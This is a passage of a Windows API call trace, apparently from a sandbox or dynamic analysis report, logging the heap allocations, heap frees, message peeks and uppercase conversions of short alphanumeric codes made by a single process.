(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.225] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0262.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.229] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0262.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.231] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.231] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.231] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.232] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.232] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.232] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.232] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0262.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.233] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.233] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.233] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.234] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.235] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.235] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.235] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0262.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.236] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.236] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.237] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.237] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 